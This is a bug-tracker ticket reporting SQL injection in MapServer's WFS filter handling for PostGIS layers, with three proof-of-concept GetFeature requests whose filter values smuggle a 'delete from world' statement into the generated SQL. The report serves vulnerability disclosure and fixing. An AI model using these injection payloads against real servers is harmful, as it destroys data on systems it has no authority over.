id,summary,reporter,owner,description,type,status,priority,milestone,component,version,severity,resolution,keywords,cc
3874,Multiple SQL injections possible on PostGIS layers with a WFS FE filter,rouault,assefa,"I've been able to trigger a SQL injection with svn trunk when running the following WFS GetFeature request:
{{{
http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world&
FILTER=name
')); delete from world; select (('
msGeometry
-90,-180 90,180
}}}
The 'delete from world' is run...
Also with the Literal of a PropertyIsLike:
{{{
http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS&
VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world&
FILTER=
name
')); delete from world; select name from world WHERE ((name LIKE '
msGeometry-90,-180 90,180
}}}
Also with the PropertyName:
{{{
map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature&
TYPENAME=world&FILTER=
name = 'a')); delete from world; select * from world where ((name
amsGeometry-90,-180 90,180
}}}
FLTGetIsBetweenComparisonSQLExpresssion() seems to be unaffected as far as the UpperBound and LowerBound are concerned because of the following check:
{{{
/* The BETWEEN bounds must split on ';' into exactly two values, otherwise no SQL is built. */
aszBounds = msStringSplit(psFilterNode->psRightNode->pszValue, ';', &nBounds);
if (nBounds != 2)
    return NULL;
}}}
However there are perhaps more clever ways of exploiting it despite that.
The issue likely affects previous MS versions, and perhaps other backends, and perhaps other places in the code I haven't seen.
Attached a patch that fixes the issue, but it is not perfect. See comment in the patch.",defect,closed,normal,6.0.1 release,Security/Vulnerability (Private),svn-trunk (development),normal,fixed,,aboudreault assefa sdlime dmorissette pramsey colivier msmitherdc